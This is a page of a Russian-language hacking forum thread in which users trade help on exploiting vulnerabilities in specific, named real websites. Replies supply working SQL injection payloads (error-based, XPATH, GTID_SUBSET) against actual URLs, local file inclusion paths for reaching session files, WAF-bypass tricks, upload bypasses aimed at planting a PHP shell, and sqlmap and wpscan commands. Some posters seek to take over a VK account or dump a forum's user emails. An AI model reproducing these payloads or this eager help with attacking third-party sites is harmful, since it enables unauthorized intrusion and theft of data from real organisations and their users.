PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 [10] 11 12

crlf
14.02.2018, 15:55
z3u5 said:
↑ (https://antichat.live/posts/4184221/)
Спасибо, как читалку отличить от инклуда? Пускать в логи должно?


С большой долей вероятности можно определить исходя из контекста. В этом случае, по URI видно, что используется некий функционал галереи, а по заголовкам можно понять, что отдаётся содержимое файла:


Code:
Content-Disposition: inline; filename=""
Content-Length: 0
Connection: close
Content-Type: image/jpeg

Но если какие либо внешние факторы отсутствуют, то да, нужно подтверждать экспериментально.

Читалка/инклуд на доступ к логам не влияют. Зависит от настроек системы и текущего пользователя.

crlf
14.02.2018, 16:17
crlf said:
↑ (https://antichat.live/posts/4184243/)
Но если какие либо внешние факторы отсутствуют, то да, нужно подтверждать экспериментально.


Либо прочитать любой PHP скрипт


Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../index.php

z3u5
14.02.2018, 16:35
crlf said:
↑ (https://antichat.live/posts/4184243/)
С большой долей вероятности можно определить исходя из контекста. В этом случае, по URI видно, что используется некий функционал галереи, а по заголовкам можно понять, что отдаётся содержимое файла:

Code:
Content-Disposition: inline; filename=""
Content-Length: 0
Connection: close
Content-Type: image/jpeg

Но если какие либо внешние факторы отсутствуют, то да, нужно подтверждать экспериментально.
Читалка/инклуд на доступ к логам не влияют. Зависит от настроек системы и текущего пользователя.


Спасибо, я гуманитарий просто. А если нет доступа к логам - как выглядит процесс запуска своего кода, через сеансы?

BabaDook
14.02.2018, 16:43
z3u5 said:
↑ (https://antichat.live/posts/4184268/)
Спасибо, я гуманитарий просто. А если нет доступа к логам - как выглядит процесс запуска своего кода, через сеансы?


Для этого

1) должен быть инклуд

2) не должно быть расширение(или его можно откинуть)

3) должен знать имя своего сеансового файла

site.ru/?page=../../../../../../var/log/sess_file

__________________________________________________ __________________________

.SpoilerTarget" type="button">Spoiler
https://rdot.org/forum/showthread.php?t=343

https://xakep.ru/2012/01/25/58183/

https://rdot.org/forum/showthread.php?t=1134

crlf
14.02.2018, 16:45
Сегодня день инклудов В этом посте (https://antichat.com/threads/lfi.460442/#post-4184058) есть ссылка, на хороший материал.

st55
16.02.2018, 21:34
Octavian said:
↑ (https://antichat.live/posts/4185110/)
Есть тут Sql Injection или просто ошибка? UPD: Она тут есть но не могу найти вектор

Code:
https://ums.usmf.md/hr/logAction.php/1'



Error-Based вектор, фильтруется запятая.

erwerr2321
16.02.2018, 21:40
Code:
https://ums.usmf.md/hr/logAction.php/Z' or substring(@@version from 1 for 1)=5-- -

st55
16.02.2018, 21:43
Octavian said:
↑ (https://antichat.live/posts/4185118/)
Как обойти?


JOIN.


ms13 said:
↑ (https://antichat.live/posts/4185119/)

Code:
https://ums.usmf.md/hr/logAction.php/Z' or substring(@@version from 1 for 1)=5



Ну, как вариант, если интересно слепые крутить.

cat1vo
16.02.2018, 21:47
Octavian said:
↑ (https://antichat.live/posts/4185118/)
Как обойти?




Code:
1 https://ums.usmf.md/hr/logAction.php/Z'=0 group by mid(@@version from floor(rand(0)*2))having avg(0)-- -
2 https://ums.usmf.md/hr/logAction.php/Z'--~(select*from(select@@version)f)-- -

1. Duplicate entry '5.6.28' for key 'group_key'

2. BIGINT value is out of range in '-(~((select '5.6.28' from dual)))'

Octavian
19.02.2018, 22:44
Есть сайт загружает


Code:
6621519064845-asd.php.jpg

загрузил длинное название с расчетом на обрез


Code:
6621519064845-(около 200 символов).php.jpg

в результате получил что ожидал


Code:
6621519064845-(около 200 символов).php

но увы при запись в бд обрезается но на сервере сохраняет оригинал


Code:
6621519064845-(около 200 символов).php.jpg

Вопрос какое название носят такие уязвимость, и какие фичи эксплуатации можно попробовать? По длине php никак не обрежет ?

Muracha
23.02.2018, 10:58
Попробуй залить шелл через плохую обработку mine-type используя tor+live http clone

Уязвимости типа "некорректной обработки данных при загрузке файлов пользователей".

Самая изощренная уязвимость но и самая интересная. Да да, это вам не скули крутить

t0ma5
24.02.2018, 07:33
Muracha said:
↑ (https://antichat.live/posts/4187178/)
Да да, это вам не скули крутить


действительно, там всё известно и понятно


Code:
root@....[....]> select{omg+1}and(1=0)UNION(select(SELECT{_ .``1.e.table_name}from(information_schema.tables)l imit 1));
+-----------------+
| {omg+1}and(1=0) |
+-----------------+
| 0 |
| CHARACTER_SETS |
+-----------------+
2 rows in set (0.00 sec)

каждый баг многогранен

Sensoft
28.02.2018, 11:19
Кто может подсказать направление не как не могу раскрутить


Code:
http://www.puzzledragonx.com/en/news.asp?nid=494

Jerri
08.03.2018, 22:20
Sensoft said:
↑ (https://antichat.live/posts/4188654/)
Кто может подсказать направление не как не могу раскрутить

Code:
http://www.puzzledragonx.com/en/news.asp?nid=494



Conversion failed when converting the varchar value '494'' to data type int.

Ни о чем не говорит?

Sensoft
08.03.2018, 23:32
Jerri said:
↑ (https://antichat.live/posts/4191267/)
Conversion failed when converting the varchar value '494'' to data type int.
Ни о чем не говорит?


нет

ghost8
08.03.2018, 23:54
Sensoft said:
↑ (https://antichat.live/posts/4191297/)
нет


ну так переведи,или даже это трудно сделать.

Sensoft
09.03.2018, 00:00
ghost8 said:
↑ (https://antichat.live/posts/4191301/)
ну так переведи,или даже это трудно сделать.


А ну ка умник расскажи что значит данная ошибка

То что ошибка при образование данных это понятно но дальше то что ?

BabaDook
09.03.2018, 00:19
Так помогите раскрутить раз такие умные все

cat1vo
09.03.2018, 02:41
Sensoft said:
↑ (https://antichat.live/posts/4191303/)
А ну ка умник расскажи что значит данная ошибка
То что ошибка при образование данных это понятно но дальше то что ?


Идти и читать про типы и приведение типов данных

cna
14.03.2018, 22:16
Integer Exeption error

нету скули ошибка просто

invalid input syntax for type numeric: ""

ошибку не возможно раскрутить когда колонка имеет дататайп INT но можно в некоторых базах данных бывает

Exception while inserting ...или Incorrect Syntax near ' '. datatype INT (https://stackoverflow.com/questions/48440698/incorrect-syntax-near-exception-while-inserting-encrypted-password-md5-in)

и тд)

когда колонка сама как стринг а переменная id цифра

Muracha
15.03.2018, 12:16
Как залить файл php на сервер? И возможно ли это?

Имеются исходники. Крутится на joomla 1.5

Могу дать ссылку если нужно.

Пытался самостоятельно через curl и charkes - выдает ошибку 1002 - то есть неправильный тип файлов. Пытался подменить. Да.

Если в той же Чарли ничего не редактировать, то отправляет на сайт без проблем.

.SpoilerTarget" type="button">Spoiler: share.php


Code:
setConfig($oConfig);
$sShareUrl = null;
$iResult = $oSharer->doShare($sShareUrl);
if ($iResult == 1) {
print $sBaseUrl . $sShareUrl;
} else {
print $sBaseUrl . '?ec=' . $iResult;
}
} else {
error_log('Sign is incorrect => iAuid:' . $iAuid . ' sSign:' . $sSign . ' sScriptUri:' . $sScriptUri);
print $sBaseUrl . '?ec=1001'; //подпись не совпадает
}
} else {
error_log('Some parameters are not set => iAuid:' . $iAuid . ' sSign:' . $sSign . ' Image:' . ($Image ? '+' : '-'));
print $sBaseUrl . '?ec=1000'; //пропущены обязательные параметры
}


.SpoilerTarget" type="button">Spoiler: share.class.php


Code:
auid = $auid;
$this->fileInfo = $fileInfo;
$this->previewInfo = $previewInfo;
$this->shareType = $shareType;
$this->sign = $sign;
}

/**
* @param $sFolder
*/
private function createFolder($sFolder)
{
if (!file_exists($sFolder)) {
mkdir($sFolder, 0777);
}
}

/**
* @return null|string
*/
private function createUserFolder()
{
if ($this->auid) {
$shareFolder = dirname(__FILE__) . '/../../' . $this->oConfig->shareFolderName;
$this->createFolder($shareFolder);
$shareFolder10000 = $shareFolder . (intval($this->auid/10000)) . '/';
$this->createFolder($shareFolder10000);
$shareFolder1000 = $shareFolder10000 . (intval($this->auid/1000)) . '/';
$this->createFolder($shareFolder1000);
$shareFolder100 = $shareFolder1000 . (intval($this->auid/100)) . '/';
$this->createFolder($shareFolder100);
$shareFolder1 = $shareFolder100 . (intval($this->auid)) . '/';
$this->createFolder($shareFolder1);
return $shareFolder1;
}

return null;
}

/**
* @return string
*/
public function getUserFolder()
{
return $this->oConfig->shareFolderName . intval($this->auid/10000) . '/' . intval($this->auid/1000)
. '/' . intval($this->auid/100) . '/' . intval($this->auid) . '/';
}

/**
* @param $oConfig
*/
public function setConfig($oConfig)
{
$this->oConfig = $oConfig;
$this->dbInfo = array(
'mysqlHost' => $this->oConfig->host,
'mysqlUser' => $this->oConfig->user,
'mysqlPassword' => $this->oConfig->password,
'mysqlDB' => $this->oConfig->db,
);
}

/**
* @param $auid
*/
public function setAuid($auid)
{
$this->auid = $auid;
}

/**
* @param $sResult
* @return int
*/
public function doShare(& $sResult)
{
$sUserFolder = $this->createUserFolder();
if (!$sUserFolder) return 1003; //ошибка при загрузке файла на сервер

$time = time();

// Заливаем основную картинку
$imageInfo = getimagesize($this->fileInfo['tmp_name']);
if (empty($imageInfo[0]) || empty($imageInfo[1])) return 1002; //неверный тип файла
if (!in_array($imageInfo['mime'], $this->allowedMime)) return 1002; //неверный тип файла
$aExt = explode('/', $imageInfo['mime']);
$fileName = $time . '.' . $aExt[1];
$sDest = $sUserFolder . $fileName;
move_uploaded_file($this->fileInfo['tmp_name'], $sDest);

// Заливаем превью (если есть что)
$previewFileName = '';
if ($this->previewInfo) {
$imageInfo = getimagesize($this->previewInfo['tmp_name']);
if (empty($imageInfo[0]) || empty($imageInfo[1])) return 1002; //неверный тип файла
if (!in_array($imageInfo['mime'], $this->allowedMime)) return 1002; //неверный тип файла
$aExt = explode('/', $imageInfo['mime']);
$previewFileName = $time . '-thumb.' . $aExt[1];
$sDest = $sUserFolder . $previewFileName;
move_uploaded_file($this->previewInfo['tmp_name'], $sDest);
}

// Сохраняем, формируем ответ, если ОК
$iResult = $this->save($fileName, $previewFileName);
if (!$iResult) return 1004;
$sResult = '?share='.$iResult;

return 1;
}

/**
* @param $fileName
* @param string $previewFileName
* @return mixed
*/
public function save($fileName, $previewFileName = '')
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oSQL->query('INSERT INTO tbl_share_info (auid, filename, preview_filename, sharedate) VALUES ('
. intval($this->auid) . ', "' . $fileName . '", "' . $previewFileName . '", NOW())');

return $oSQL->insert_id;
}

/**
* @param $id
* @return mixed
*/
public function get($id)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT * FROM tbl_share_info WHERE id=' . intval($id));

return $oResult->fetch_array();
}

/**
* @param $id
* @return int
*/
public function getPrev($id)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT MAX(id) as prev FROM tbl_share_info WHERE idfetch_array();

return intval($aRow['prev']);
}

/**
* @param $id
* @return int
*/
public function getNext($id)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT MIN(id) as next FROM tbl_share_info WHERE id>' . intval($id));
$aRow = $oResult->fetch_array();

return intval($aRow['next']);
}

/**
* @param $auid
* @return mixed
*/
public function checkUserScreens($auid)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT COUNT(*) AS iCnt FROM tbl_share_info WHERE auid=' . intval($auid));
$aRow = $oResult->fetch_assoc();

return $aRow['iCnt'];
}

/**
* @param $auid
* @return array
*/
public function getUserScreens($auid)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT * FROM tbl_share_info WHERE auid=' . intval($auid) . ' ORDER BY sharedate DESC');
$aResult = array();
while ($aRow = $oResult->fetch_assoc()) {
$aResult[] = $aRow;
}

return $aResult;
}
}


.SpoilerTarget" type="button">Spoiler: mysql.class.php


Code:
options(MYSQLI_OPT_CONNECT_TIMEOUT, 5);
if (!self::$oDbInstance[$sKey]->real_connect(
$connectionData['mysqlHost'],
$connectionData['mysqlUser'],
$connectionData['mysqlPassword'],
$connectionData['mysqlDB']
)) {
self::$oDbInstance[$sKey] = null;
} else {
self::$oDbInstance[$sKey]->set_charset('utf8');
}
}

return self::$oDbInstance[$sKey];
}

public function __destruct()
{
/*if (self::$oDbInstance) {
self::$oDbInstance->close();
self::$oDbInstance = null;
}*/
}
}

crlf
15.03.2018, 12:36
PHP:
...
private$allowedMime= array(
'image/png',
'image/gif',
'image/jpeg',
);
...
if (!in_array($imageInfo['mime'],$this->allowedMime)) return1002;//неверный тип файла
$aExt=explode('/',$imageInfo['mime']);
$fileName=$time.'.'.$aExt[1];
$sDest=$sUserFolder.$fileName;
move_uploaded_file($this->fileInfo['tmp_name'],$sDest);
...


Расширение сохраняемого файла является частью $imageInfo['mime'], который, ранее, проверяется по белому списку. Поэтому загрузить файл с произвольным расширением не получится.

Muracha
20.03.2018, 17:44
Ничего не понимаю в Руби, но ситуация аналогична?

Скрипт gyazo

Файл без каких либо проверок на внутреннюю часть загружается на файл, но сохраняется только в png?


Code:
File.open("data/#{hash}.png","w").print(imagedata)

Есть ли возможность обойти параметр и сохранить файл в расширении php?(Через Чарли например)


Code:
#!/usr/bin/env ruby
# -*- ruby -*-
#
# $Date$
# $Rev$
#
require 'cgi'
require 'digest/md5'
require 'sdbm'

cgi = CGI.new("html3")

id = cgi.params['id'][0].read
imagedata = cgi.params['imagedata'][0].read
hash = Digest::MD5.hexdigest(imagedata)

create_newid = false
if not id or id == "" then
id = Digest::MD5.hexdigest(cgi.remote_addr + Time.now.to_s)
create_newid = true
end

dbm = SDBM.open('db/id',0644)
dbm[hash] = id
dbm.close

File.open("data/#{hash}.png","w").print(imagedata)

headers = {}
if create_newid then
headers = {"X-Gyazo-Id"=>id}
end

cgi.out(headers){"http://gyazo.com/#{hash}.png"}

qwaszx000
20.03.2018, 21:38
Code:
file.php?

или


Code:
file.php\0

На вход подать.

.:[melkiy]:.
30.03.2018, 03:35
парни, подскажите как этот запрос переделать, чтобы вывести инфу из нужной таблицы с условием where ?


Code:
id=1+AND+EXTRACTVALUE(22,CONCAT(0x5c,version(),(SE LECT+(ELT(1=1,1))),database()))--+1

cat1vo
30.03.2018, 04:40
:."]
.:[melkiy]:. said:
↑ (https://antichat.live/posts/4197783/)
парни, подскажите как этот запрос переделать, чтобы вывести инфу из нужной таблицы с условием where ?

Code:
id=1+AND+EXTRACTVALUE(22,CONCAT(0x5c,version(),(SE LECT+(ELT(1=1,1))),database()))--+1





PHP:
id=1+AND+EXTRACTVALUE(22,CONCAT(0x5c,(select+table _name+from+information_schema.tables+where+table_s chema!='information_schema'+limit+0,1)))--+1

XPATH-Error-Based-Injection-Extractvalue (http://securityidiots.com/Web-Pentest/SQL-Injection/XPATH-Error-Based-Injection-Extractvalue.html)

BabaDook
31.03.2018, 18:03
самый очевидный

+and+if(substring(@@version,1,1)=5,sleep(2224),nul l)

С выводом нету вектора, возможно в дальнейшем будет.

BabaDook
31.03.2018, 19:45
в чём проблема то?

BabaDook
31.03.2018, 20:02
Я не пробовал, но я не вижу препятствий. Обычная временная инъекция.

17919
07.04.2018, 18:24
как аккаунт вк открыть?

Gorev
07.04.2018, 18:45
17919 said:
↑ (https://antichat.live/posts/4199981/)
как аккаунт вк открыть?


судя по постам в разных темах, то для тебя только один вариант, написать на бумажке аккаунт и встав на колени перед ним молить великого Бога контакта и всея соцсети что бы он открылся

17919
07.04.2018, 21:10
Gorev said:
↑ (https://antichat.live/posts/4199987/)
судя по постам в разных темах, то для тебя только один вариант, написать на бумажке аккаунт и встав на колени перед ним молить великого Бога контакта и всея соцсети что бы он открылся


с чего такой детский вывод?

Jerri
08.04.2018, 00:53
17919 said:
↑ (https://antichat.live/posts/4200026/)
с чего такой детский вывод?




вы скажите лучше в итоге это реально в данный момент получить логин и пароль вкс помощьюsql injection? (https://antichat.com/posts/4200049/)

erwerr2321
08.04.2018, 21:27
хз, на счёт sqli, и не помню чтоб такое дисклоузили, а вот xxe там пофиксили 2 месяца назад...

опять же это то, что из открытого

RWD
10.04.2018, 03:29
Vip77 said:
↑ (https://antichat.live/posts/4198133/)
https://i.snag.gy/qkS0RY.jpg


похоже на WAF

попробуй --current-user

бывает такое что базу не достает, но пользователя бд читает.

еще вариант искать другу скулю на сайте, возможно где будет UNION или error based.

Muracha
17.04.2018, 00:03
нмап не может раскрутить скулу

.SpoilerTarget" type="button">Spoiler: 2
sqlmap -u http://wellaprof.elle.ru/competition?order_by=date&offset=9 --dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
Остальные скрипты тоже.

Ручками так выходит ошибка:

Incorrect usage of UNION and ORDER BY

Проблема в фильтрации или на самом деле скули там нет?

Sensoft
17.04.2018, 00:41
Muracha said:
↑ (https://antichat.live/posts/4202498/)
нмап не может раскрутить скулу
Spoiler: 2
sqlmap -u
http://wellaprof.elle.ru/competition?order_by=date&offset=9
--dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
Остальные скрипты тоже.
Ручками так выходит ошибка:
Incorrect usage of UNION and ORDER BY
Проблема в фильтрации или на самом деле скули там нет?


Скуля там есть это 100%

по ошибке всё ясно там может waf стоит ща сам гляну

Sensoft
17.04.2018, 00:44
Muracha said:
↑ (https://antichat.live/posts/4202498/)
нмап не может раскрутить скулу
Spoiler: 2
sqlmap -u
http://wellaprof.elle.ru/competition?order_by=date&offset=9
--dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
Остальные скрипты тоже.
Ручками так выходит ошибка:
Incorrect usage of UNION and ORDER BY
Проблема в фильтрации или на самом деле скули там нет?


http://wellaprof.elle.ru/competitio...R(101),CHAR(109),CHAR(109),CHAR(97))) ),1)-- 1 (http://wellaprof.elle.ru/competition?order_by=date&offset=1%20procedure%20analyse(extractvalue(rand() %2cconcat(0x3a%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR (64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108 )%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))) )%2c1)--%201)

Muracha
17.04.2018, 01:17
Sensoft said:
↑ (https://antichat.live/posts/4202507/)
http://wellaprof.elle.ru/competition?order_by=date&offset=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHA R(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(10 5),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97 )))),1)-- 1 (http://wellaprof.elle.ru/competition?order_by=date&offset=1%20procedure%20analyse(extractvalue(rand() %2cconcat(0x3a%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR (64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108 )%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))) )%2c1)--%201)


Спасибо, почему на конце -- 1? А не -- или /*

Muracha
17.04.2018, 01:56
И почему не работает запрос, он же верный по своей структуре?

.SpoilerTarget" type="button">Spoiler: 1
http://wellaprof.elle.ru/competitio...(),concat(0x3a,CONCAT(AES_DECRYPT(AES _ENCRYPT (http://wellaprof.elle.ru/competition?order_by=date&offset=1%20procedure%20analyse(extractvalue(rand() %2cconcat(0x3a%2cCONCAT(AES_DECRYPT(AES_ENCRYPT)(T ABLE_NAME,0x71),0x71))))%2c1)+FROM+INFORMATION_SCH EMA.TABLES%20--%202

Sensoft
17.04.2018, 02:07
Muracha said:
↑ (https://antichat.live/posts/4202516/)
И почему не работает запрос, он же верный по своей структуре?
Spoiler: 1
http://wellaprof.elle.ru/competition?order_by=date&offset=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(AES _DECRYPT(AES_ENCRYPT (http://wellaprof.elle.ru/competition?order_by=date&offset=1%20procedure%20analyse(extractvalue(rand() %2cconcat(0x3a%2cCONCAT(AES_DECRYPT(AES_ENCRYPT)
(
TABLE_NAME
,0x71),0x71))))%2c1)
+FROM+INFORMATION_SCHEMA.TABLES
%20--%202


там waf

Muracha
17.04.2018, 02:13
Sensoft said:
↑ (https://antichat.live/posts/4202518/)
там waf


ссылается на неверный запрос:

Вроде не waf, а я как-то неправильно составил запрос.

Допускается кстати и так но ошибка идиентичная


Code:
http://wellaprof.elle.ru/competition?order_by=date&offset=1%20procedure%20analyse(extractvalue(rand() %2cconcat(0x3a%2cCONCAT(TABLE_NAME)))%2c1)+from+in formation_schema.tables+where+table_schema!=0x696e 666f726d6174696f6e5f736368656d61--%201



You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736' at line 1


Нашел интересную книгу

https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/PT-devteev-CC-WAF.pdf

Попытался сделать по ней но тот же результат:

http://wellaprof.elle.ru/competition?order_by=date&offset=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(TAB LE_NAME))),1)+ascii(lower(mid((from+information_sc hema.tables),1,1)))-- 1 (http://wellaprof.elle.ru/competition?order_by=date&offset=1%20procedure%20analyse(extractvalue(rand() %2cconcat(0x3a%2cCONCAT(TABLE_NAME)))%2c1)+ascii(l ower(mid((from+information_schema.tables),1,1)))--%201)

По ней составил запрос для обхода WAF


http://wellaprof.elle.ru/competitio...d((database()),10,1))),0x71),0x71)))) ,1) -- 2 (http://wellaprof.elle.ru/competition?order_by=date&offset=1%20procedure%20analyse(extractvalue(rand() ,concat(0x3a,CONCAT(AES_DECRYPT(AES_ENCRYPT(ascii( lower(mid((database()),10,1))),0x71),0x71))))%2c1) %20--%202)


Выводит значение XPATH syntax error: ':108'


А такое же значение как и (0x3a%2cCONCAT(TABLE_NAME)

Но понять не могу что фильтрует и как это обойти, чтобы вывести данные.




http://wellaprof.elle.ru/competitio...id((table_name),1,1))),0x71),0x71)))) ,1) -- 2 (http://wellaprof.elle.ru/competition?order_by=date&offset=1%20procedure%20analyse(extractvalue(rand() ,concat(0x3a,CONCAT(AES_DECRYPT(AES_ENCRYPT(ascii( lower(mid((table_name),1,1))),0x71),0x71))))%2c1)% 20--%202)

BabaDook
19.04.2018, 17:42
Помогите пожалуйста, никак не могу сделать это


Code:
http://www.alphaonenow.org/story.php?news_id=2 UnIoN select 1,2,3+--+-

Никак не могу получить вывод.

Sensoft
20.04.2018, 12:02
как прописать чтобы вызвать tables ?

https://s8.hostingkartinok.com/uploads/images/2018/04/d8b976a5ba4fd370f5fc854d9621db97.png

DB_A2FF5A_icodatabase

BabaDook
20.04.2018, 16:14
Sensoft said:
↑ (https://antichat.live/posts/4203511/)
как прописать чтобы вызвать tables ?
https://s8.hostingkartinok.com/uploads/images/2018/04/d8b976a5ba4fd370f5fc854d9621db97.png
DB_A2FF5A_icodatabase


Саня, загугли mssql injection

Sensoft
20.04.2018, 16:47
BabaDook said:
↑ (https://antichat.live/posts/4203559/)
Саня, загугли mssql injection


Спасибо капитан очевидность.

Иди лучше дальше мёртвые сайты крути )

Notrak
20.04.2018, 20:08
Подскажите кто можете помочь с одного IPB форума (v 3.3.4) скачать БД емыйлов?

(пишите в личку)

Sensoft
20.04.2018, 20:24
Notrak said:
↑ (https://antichat.live/posts/4203613/)
Подскажите кто можете помочь с одного IPB форума (v 3.3.4) скачать БД емыйлов?
(пишите в личку)


https://www.exploit-db.com

https://0day.today

Найдёшь тут эксплоит тебе повезло не найдёшь значит не повезло

karkajoi
21.04.2018, 15:41
Sensoft said:
↑ (https://antichat.live/posts/4203617/)
https://www.exploit-db.com
https://0day.today
Найдёшь тут эксплоит тебе повезло не найдёшь значит не повезло


Он мне писал, у меня просто нету времени крутить, там есть sql inject и WAF

hn4sty
21.04.2018, 16:26
ребят, приветствую!

Можно ли как нибудь заюзать XSS если фильтруются <> , то есть = пустое место

BabaDook
23.04.2018, 17:10
Muracha said:
↑ (https://antichat.live/posts/4202514/)
Спасибо, почему на конце
-- 1
? А не -- или /*


Потому что советую коментарий ставить, а после него ещё символ любой, Заметь, многие делают +--+-


BabaDook said:
↑ (https://antichat.live/posts/4203298/)
Помогите пожалуйста, никак не могу сделать это

Code:
http://www.alphaonenow.org/story.php?news_id=2 UnIoN select 1,2,3+--+-

Никак не могу получить вывод.


Эх, никто таки сделал.Вопрос закрыт

karkajoi
23.04.2018, 17:31
BabaDook said:
↑ (https://antichat.live/posts/4204245/)
Потому что советую коментарий ставить, а после него ещё символ любой, Заметь, многие делают +--+-
Эх, никто таки сделал.Вопрос закрыт


http://www.alphaonenow.org/searchresults.php

В поиске 'and updatexml(NULL,concat(0x0a,(SELECT 1)),Null)--'

Alaich
23.04.2018, 17:37
PHP:
window.location.href='home.php';";
}
else
{
$message="Invalid Username or password !";
}

}

/*-------------------------End of login----------------------------------------------------*/
?>








User &nbsp;Name
" class="textbox" style="width:150px"/>



Pass word
[/COLOR]" class="textboxpwd" style="width:150px"/>



&nbsp;




[/COLOR]

Есть возможность обойти ?

Sensoft
23.04.2018, 17:56
BabaDook said:
↑ (https://antichat.live/posts/4203298/)
Помогите пожалуйста, никак не могу сделать это

Code:
http://www.alphaonenow.org/story.php?news_id=2 UnIoN select 1,2,3+--+-

Никак не могу получить вывод.


загугли sql injection

BabaDook
25.04.2018, 19:07
Помогите пожалуйста:


PHP:
0x676a72656e74616c732e636f6d2f72656e74616c5f646574 61696c732e7068703f69643d33392b554e694f6e2b53654c45 63542b312c322c332c342c352c362c372c382c392c31302c31 312c31322c31332c31342c31352c31362c31372c31382c3139 2c32302c32312c32322c32332c32342c32352c3236

Jerri
25.04.2018, 20:52
BabaDook said:
↑ (https://antichat.live/posts/4204887/)
Помогите пожалуйста:

PHP:
0x676a72656e74616c732e636f6d2f72656e74616c5f646574 61696c732e7068703f69643d33392b554e694f6e2b53654c45 63542b312c322c332c342c352c362c372c382c392c31302c31 312c31322c31332c31342c31352c31362c31372c31382c3139 2c32302c32312c32322c32332c32342c32352c3236





PHP:
0x687474703a2f2f676a72656e74616c732e636f6d2f72656e 74616c5f64657461696c732e7068703f69643d312b414e442b 4558545241435456414c55452832322c434f4e434154283078 35632c2876657273696f6e28292929292b2d2d2b2d

BabaDook
25.04.2018, 20:55
Jerri said:
↑ (https://antichat.live/posts/4204901/)

PHP:
0x687474703a2f2f676a72656e74616c732e636f6d2f72656e 74616c5f64657461696c732e7068703f69643d312b414e442b 4558545241435456414c55452832322c434f4e434154283078 35632c2876657273696f6e28292929292b2d2d2b2d



Спасибо братан

Ereee
26.04.2018, 03:00
BabaDook said:
↑ (https://antichat.live/posts/4203298/)
Помогите пожалуйста, никак не могу сделать это

Code:
http://www.alphaonenow.org/story.php?news_id=2 UnIoN select 1,2,3+--+-

Никак не могу получить вывод.


Отправляй через POST. Там видимо $_REQUEST['news_id'].


Code:
http://www.alphaonenow.org/story.php
POST: news_id = 4341 and GTID_SUBSET((SELECT database()),0)-- a

Слово "select" хорошо фильтруется, но жаль, что фильтр работает только на GET-параметрах.

BabaDook
26.04.2018, 06:27
/threads/21336/page-716#post-2897553 (https://antichat.live/threads/21336/page-716/)

Как такие запросы дедектить, методом тыка? Встречал всего 3-5 ресурсов, но скорее у меня был тупо метод тыка.

erwerr2321
26.04.2018, 11:51
man474019 said:
↑ (https://antichat.live/posts/4204999/)
http://www.alphaonenow.org/searchresults.php
'and updatexml(NULL,concat(0x0a,(SELECT user())),Null)--'


/threads/424557/page-117#post-4204250 (https://antichat.live/threads/424557/page-117/)

BabaDook
26.04.2018, 16:16
А через юнион селект не получиться? Я вроде подобрал ко-во полей.. Подумал может что-то можно сделать, было бы круто.

rudu2
28.04.2018, 03:33
Всем привет,такой вопрос,есть скуля с root правами,есть пути,винда сервер php,путаюсь лить шеел но выяснилось что стоит PDO есть умелци кто такое может обойти?

Fenix8612
28.04.2018, 09:41
Помогите раскрутить данную уязвимость

http://www.lsrrealestate-m.ru/offers/?id=1433'

Ошибка выводиться не на страницу а в адресную строку.

qwaszx000
28.04.2018, 18:34
Это не sql inj вроде.

rudu2
28.04.2018, 19:11
Fenix8612 said:
↑ (https://antichat.live/posts/4205481/)
Помогите раскрутить данную уязвимость
http://www.lsrrealestate-m.ru/offers/?id=1433
'
Ошибка выводиться не на страницу а в адресную строку.


http://www.lsrrealestate-m.ru/common/500/?errmessage=28.04.2018 18:10:52

ASPCode=

Source=

Category=Microsoft VBScript runtime

File=/template_offers.asp

Line=35

Column=-1

Description=Type mismatch: '[string: "1433'"]'

Column=

ref=

url=www.lsrrealestate-m.ru/offers/Default.asp?id=1433%27 (http://www.lsrrealestate-m.ru/offers/Default.asp?id=1433%27)

тут нет sqlini

Тот_самый_Щуп
02.05.2018, 22:51
Подскажите по wordpress, есть ли какая либо возможность собрать данные о всех зарегистрированных пользователях в WP? Я не имею ввиду привычные уязвимости типа SQL,RCE. Хотя бы логины, а в идеале почтовые адреса, эксплойты под какую то конкретную версию WP не обязательно, если указанные возможности в каких либо версиях WP есть, поделитесь плиз ссылочками на POC

cat1vo
03.05.2018, 05:26
Gorbachev said:
↑ (https://antichat.live/posts/4206695/)
Подскажите по wordpress, есть ли какая либо возможность собрать данные о всех зарегистрированных пользователях в WP? Я не имею ввиду привычные уязвимости типа SQL,RCE. Хотя бы логины, а в идеале почтовые адреса, эксплойты под какую то конкретную версию WP не обязательно, если указанные возможности в каких либо версиях WP есть, поделитесь плиз ссылочками на POC


wpscan --url www.local.test (http://www.local.test) --enumerate u

Тот_самый_Щуп
06.05.2018, 03:00
cat1vo (https://antichat.live/members/94094/), man474019 (https://antichat.live/members/269161/), благодарю.

Ещё вопрос по поводу конфига joomla, там есть секретный ключ public $secret, зная этот ключ можно ли как то воздействовать на сайт? К примеру, может быть из него генерируются админские сессии, или что то в этом роде?

holdik
17.05.2018, 14:00
Имеется XSS на сайте, alert работает, абсолютно все скрипты срабатываются, фильтра нет, но document.cookie отдает пустое значение. Готов заплатить деньги за консультацию.

cat1vo
